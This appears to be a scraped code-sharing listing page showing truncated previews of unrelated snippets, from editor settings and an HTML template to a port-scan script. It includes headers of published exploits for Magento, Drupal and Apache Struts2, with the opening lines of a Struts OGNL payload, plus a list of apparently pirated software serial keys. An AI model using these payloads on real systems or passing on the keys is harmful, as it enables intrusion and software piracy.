This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Place your settings in this file to overwrite default and user settings. | |
{ | |
"editor.wrappingColumn": 0, | |
"files.exclude": { | |
"**/node_modules": {}, | |
"typings": {}, | |
"**/*.map": {}, | |
"**/*.js": { | |
"when": "$(basename).ts" | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{ | |
"name":"Barot Bellingham", | |
"shortname":"Barot_Bellingham", | |
"reknown":"Royal Academy of Painting and Sculpture", | |
"bio":"Barot has just finished his final year at The Royal Academy of Painting and Sculpture, where he excelled in glass etching paintings and portraiture. Hailed as one of the most diverse artists of his generation, Barot is equally as skilled with watercolors as he is with oils, and is just as well-balanced in different subject areas. Barot's collection entitled \"The Un-Collection\" will adorn the walls of Gilbert Hall, depicting his range of skills and sensibilities - all of them, uniquely Barot, yet undeniably different" | |
}, { | |
"name":"Jonathan G. Ferrar II", | |
"shortname":"Jonathan_Ferrar", | |
"reknown":"Artist to Watch in 2012", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<head> | |
<meta charset="utf-8" /> | |
<meta http-equiv="X-UA-Compatible" content="IE=edge"> | |
<title>Page Title</title> | |
<meta name="viewport" content="width=device-width, initial-scale=1"> | |
</head> | |
<body> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
Code takes urls from cmd line. | |
ex: ./crawler.py https://packages.debian.org/jessie/armel/patch/download | |
The Crawler downalods all the debian patch files from the give link and stores in the specified outpath | |
References: | |
https://stackoverflow.com/questions/12996274/get-file-size-from-content-length-value-from-a-file-in-python-3-2 | |
https://stackoverflow.com/questions/29827479/beautifulsoup-download-all-zip-files-from-google-patent-search | |
""" | |
from bs4 import BeautifulSoup |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
ip=$1; | |
echo "scaning: $ip"; | |
ports=$(nmap -T4 --min-rate=1000 -p- $ip| grep ^[0-9]|cut -d '/' -f 1| tr '\n' ',' | sed s/,$//); | |
echo "open ports: $ports" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Serial Keys: | |
FU512-2DG1H-M85QZ-U7Z5T-PY8ZD | |
CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD | |
GV7N2-DQZ00-4897Y-27ZNX-NV0TD | |
YZ718-4REEQ-08DHQ-JNYQC-ZQRD0 | |
GZ3N0-6CX0L-H80UP-FPM59-NKAD4 | |
YY31H-6EYEJ-480VZ-VXXZC-QF2E0 | |
ZG51K-25FE1-H81ZP-95XGT-WV2C0 | |
VG30H-2AX11-H88FQ-CQXGZ-M6AY4 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################################## | |
#Exploit Title : Magento Shoplift exploit (SUPEE-5344) | |
#Author : Manish Kishan Tanwar AKA error1046 | |
#Date : 25/08/2015 | |
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi | |
#Debugged At : Indishell Lab(originally developed by joren) | |
################################################################################################## | |
""" | |
//////////////////////// | |
/// Overview: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Drupal 7.x Module Services - Remote Code Execution | |
# Exploit Title: Drupal 7.x Services Module Remote Code Execution | |
# Vendor Homepage: https://www.drupal.org/project/services | |
# Exploit Author: Charles FOL | |
# Contact: https://twitter.com/ambionics | |
# Website: https://www.ambionics.io/blog/drupal-services-module-rce | |
#!/usr/bin/php | |
<?php |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
VMWARE_VERSION=workstation-15.5.6 | |
TMP_FOLDER=/tmp/patch-vmware | |
rm -fdr $TMP_FOLDER | |
mkdir -p $TMP_FOLDER | |
cd $TMP_FOLDER | |
git clone https://github.com/mkubecek/vmware-host-modules.git | |
cd $TMP_FOLDER/vmware-host-modules | |
git checkout $VMWARE_VERSION | |
git fetch |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Reference: https://medium.com/@lucideus/exploiting-apache-struts2-cve-2017-5638-lucideus-research-83adb9490ede | |
# CVE: 2017-5638 - Apache Struts2 S2-045 | |
#!/usr/bin/python | |
# -*- coding: utf-8 -*- | |
import urllib2 | |
import httplib | |
def exploit(url, cmd): | |
payload = "%{(#_='multipart/form-data')." | |
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." |
OlderNewer